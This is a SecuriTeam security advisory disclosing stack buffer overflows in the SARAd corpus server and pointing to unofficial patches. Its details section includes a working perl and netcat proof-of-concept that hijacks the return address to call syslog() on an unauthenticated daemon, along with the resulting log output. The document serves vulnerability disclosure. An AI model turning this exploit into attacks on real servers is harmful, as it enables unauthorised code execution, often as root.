The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SARAd Buffer Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.natcorp.ox.ac.uk/SARA/> SARA is a specialized software used
to serve the British National Corpus (BNC) content. The British National
Corpus is used by many linguists for research on the English language and
is licensed commercially by the BNC Consortium. The server software run on
various flavors of Unix and is freely available as source .
There are several buffer overflows present in the SARA server (SARAd), one
of which is exploitable allowing an attacker to execute arbitrary code on
the server.
DETAILS
Vulnerable Systems:
* SARA latest version, 16th April 2001
Successful exploitation of the buffer overflow will result in code
execution with the privileges of the SARA daemon, which should run in a
dedicated unprivileged account. However, most are using root privileges.
No authentication is required by the daemon and thus an attack is easy to
carry out.
The overflows are classic stack-based buffer overflows caused by
insufficient bounds checking, allowing the attacker to overwrite the
return address. The following perl snippet does a return-to-libc on Linux
2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog():
perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
| netcat victim 7000
The output from this simple operation is:
Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string
SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCK @
Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority:
80e5540
Aug 19 20:50:05 drgonzo sarad[6519]:P^F
Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal
11
Patch Availability:
Although there is no official patch and the program is quite old, there
are two unofficial patches, one that should be suitable for all systems
and fixes the abovementioned bugs, and one that does the same and also
lets SARA daemon automatically chroot itself to the corpus directory and
drops rights to a specified account. The later will not compile on Windows
machine even though the server itself can be compiled on Windows.
You can get the patches, including fairly simple installation instructions
from
<http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz>
http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz.
ADDITIONAL INFORMATION
The information has been provided by <mailto:Matthias.Bethke@gmx.net>
Matthias Bethke.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
